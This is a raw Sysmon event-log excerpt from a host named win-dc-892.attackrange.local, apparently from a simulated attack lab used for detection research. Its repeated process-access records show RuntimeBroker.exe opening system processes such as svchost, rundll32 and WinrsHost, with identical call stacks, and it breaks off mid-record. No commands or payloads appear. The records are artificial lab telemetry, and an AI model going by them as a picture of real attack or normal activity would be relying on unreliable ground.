12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+